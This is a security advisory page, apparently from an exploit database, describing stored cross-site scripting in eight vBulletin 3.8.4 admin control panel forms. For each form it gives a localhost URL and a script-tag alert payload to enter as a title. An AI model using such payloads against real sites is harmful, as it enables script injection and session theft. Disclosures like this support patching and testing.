vBulletin adminCP 3.8.4 cross site scripting

2010-01-12 / 2010-01-13
Credit: Ashiyane Digital Security Members (Cair3x)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################################ .::vBulletin adminCP Cross-Site Scripting ::. # Exploit Title: vBulletin adminCP Cross-Site Scripting # Date: 2009 # Author: Ashiyane Digital Security Members (Cair3x) # Software Link: http://www.vbulletin.com/ # Version: 3.8.4 and all Version # Tested on: vBulletin 3.8.4 # CVE : # Code : -::Forum Manager => Add New Forum ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add ) Add a new title . use the following code as title name : .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . -::Calendar Manager => Add New Calendar ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add ) Add a new title . use the following code as title name : .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . -::Usergroup Manager => Add New Usergroup ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add ) Add a new title . use the following code as title name : .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . -::User Rank Manager => Rank Type ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add ) use the following code as (OR you may enter text HTML is allowed) Text . .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . -::BB Code Manager => Add New BB Code ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add ) Complete All Required Fields And Enter Javascript Code in Title : .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . -::Scheduled Task Manager => Add New Scheduled Task ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit ) Complete All Required Fields And Enter Javascript Code in Title : .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . -::FAQ Manager => Add New FAQ Item ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add ) Add a new title . use the following code as title name : .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . -::Style Manager => Add New Style ::- Exploit : Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle ) Add a new title . use the following code as title name : .::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code . All of the best * Cair3x From Ashiyane Digital Security Members : (WwW.Ashiyane.org/forums/)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top